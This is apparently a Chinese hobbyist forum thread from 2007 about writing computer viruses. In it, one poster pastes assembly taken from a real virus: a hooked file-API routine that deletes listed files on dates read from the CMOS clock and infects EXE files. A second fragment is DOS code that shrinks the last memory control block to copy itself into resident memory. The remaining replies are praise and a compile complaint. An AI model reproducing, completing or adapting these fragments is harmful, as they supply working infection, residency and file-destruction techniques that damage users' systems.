顶,正想学这类

新手，不过还是顶一下！

熊猫烧香吗？

卧龙版主 你能不能每1行注释下啊 浪费你点时间 谢谢了

版主真是强呀，佩服，我也要努力了
我也要研究一下哈

楼主所说的用C语言来编写病毒压根来就是对文件的操作.并不是病毒.假设对仅仅这样子对文件进行操作就算是病毒的话.那么在这世上只是学编程的一定就是病毒制造者了.因为大家都知道每一种编程语言都有对文件的一章..

复制内容到剪贴板

代码:

照楼主的意思我们也可以这样子写写:
我们随便拿个病毒来分析一下其中它是怎么对文件进行操作.
-----------读取DAW并删除其指定文件---------
GETDAWFILE:
        MOV DR1,ESI         ;被操作文件名尾指针->DR1
        MOV AX,0D500H
        XOR EBX,EBX
        XOR ECX,ECX
        XOR EDX,EDX      ;MOV EDX,1
        INC EDX
        LEA ESI,EDI[COM_FN-START]
        CALL INT20_40_32
        JC FIND_NOCOM

        MOV EBX,EAX
        MOV  AX,0D800H
        CALL INT20_40_32
        JC CLOSE_GETCOM

        MOV ECX,EAX
        XOR EDX,EDX
        LEA ESI,EDI[COMLINE-START]
        CALL READFILE
CLOSE_GETCOM:
        MOV  AX,0D700H
        CALL INT20_40_32

        CLD
        XCHG ESI,EDI           ;ESI->@  EDI->COMLINE
        MOV  AX,000DH
REPL_CON:
        REPNZ SCASB
        JECXZ EXIT_REPL_LOOP
        DEC EDI
        INC ECX
        MOV [EDI],AH
        JMP  REPL_CON
        DW    87C7H
EXIT_REPL_LOOP:
        XCHG EDI,ESI           ;EDI->@ ESI->COMLINE末

        CMP [ESI-3],BYTE PTR '#'
        JNZ FIND_NOCOM

        MOV AL ,07H
        OUT 70H,AL
        IN  AL ,71H
        MOV CL ,AL
        MOV AL ,08H
        OUT 70H,AL
        IN  AL ,71H
        MOV CH ,AL

        MOV AH,'0'

        MOV DX,[ESI-7]     ;读月
        SUB DH,AH
        SUB DL,AH
        SHL DL,4
        ADD DL,DH
        OR  DL,DL
        JZ  IGNOREMONTH
        CMP DL,CH
        JNZ CMP_EXE
IGNOREMONTH:
        MOV DX,[ESI-5]     ;读日
        SUB DH,AH
        SUB DL,AH
        SHL DL,4
        ADD DL,DH
        OR  DL,DL
        JZ  FIND_NOCOM
        CMP DL,CL
        JNZ CMP_EXE
FIND_NOCOM:
        MOV ESI,DR1
        ADD EDI,OFFSET COMLINE-OFFSET START

        XOR AL ,AL
        OUT 70H,AL
        IN  AL ,71H
        MOV BH,AL
        AND BH,00011111B          ;比较秒(BH=SEC*2)
        XOR  BL,BL
        XOR  EDX,EDX
        DEC  EDI
        DEC  EDI
DELF_LOOP:
        NOT BL
        ADD EDI,EDX
        INC EDI
        INC EDI
        CMP [EDI],BYTE PTR 0
        JZ  CMP_EXE
        CALL GET_STL
        MOV EDX,ECX
        PUSH ESI
        SUB ESI,EDX
        CALL CMP_ST
        POP  ESI
        JNZ DELF_LOOP
        OR  BL,BL
        JNZ DEL_IT_EVERYTIME
        OR  BH,BH
        JNZ DELF_LOOP
DEL_IT_EVERYTIME:
        CALL DEL_FILE
        JMP EXITAPI
        DW    87C7H
;-----------读取DAW并删除其指定文件---------
CMP_EXE:
        MOV ESI,DR1
        MOV  EAX,NOT('EXE.')              ;是否为EXE文件
        NOT  EAX
        CMP  [ESI-4],EAX
        JNZ  EXITAPI
        CALL INF_EXE
;-------退出处理--------------------------
EXITAPI:MOV  EDI,DR0
        MOV  EDI[ENTERF-START],BYTE PTR 0
CALLOLDAPI:
        POPAD
        MOV  EAX,0
OLDAPI  =  DWORD PTR $-4
        JMP [EAX]

[[italic] 本帖最后由 cince 于 2007-11-29 04:52 编辑 [/italic]]

复制内容到剪贴板

代码:

;================================================================
no_active:
--mov ah,52------;取磁盘缓冲区地址
--int 21
--mov bx,es:[bx-2]----;取第一个 MCB 地址
--xor di,di------;清DI
loop_search:
--mov es,bx------;查找最后一个MCB地址
--add bx,word ptr es:[di+3]
--inc bx
--cmp byte ptr es:[di],5a
--jnz loop_search
;================Found Last MCB=========--
--mov bx,es------;保存找到的最后一个MCB地址----
--mov ax,word ptr es:[di+3]--;取最后一个MCB大小
--sub ax,vir_para------;剪去自己的PARA
--jnc keep_in_memory----;溢出则表明不够驻留
--jmp run_host------;否则继续
keep_in_memory:
--mov word ptr es:[di+3],ax--;改写最后一个MCB大小
--add bx,ax------;计算驻留区段地址
--inc bx
--mov es,bx------;并送入ES
--push cs
--pop ds--------;令DS=CS
--mov cx,vir_bytes----;将自己搬移
--cld
--rep movsb

好

我直接编译的，有错误！我qq:379219296

啊，病毒原来素这么写的－ －！ 汗